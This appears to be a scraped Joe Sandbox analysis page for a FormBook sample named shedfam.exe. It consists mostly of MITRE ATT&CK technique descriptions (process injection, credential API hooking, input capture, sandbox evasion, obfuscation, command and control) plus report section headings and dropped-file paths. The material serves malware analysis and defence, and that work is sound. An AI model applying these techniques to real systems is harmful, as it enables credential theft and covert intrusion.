Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report shedfam.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\hocjhpxqy.mm

C:\Users\user\AppData\Local\Temp\kmhbvf.exe

C:\Users\user\AppData\Local\Temp\nse13E9.tmp

C:\Users\user\AppData\Local\Temp\piqsiyngg.yfg

C:\Users\user\AppData\Local\Temp\wenvaisrl.au3

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
shedfam.exe

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre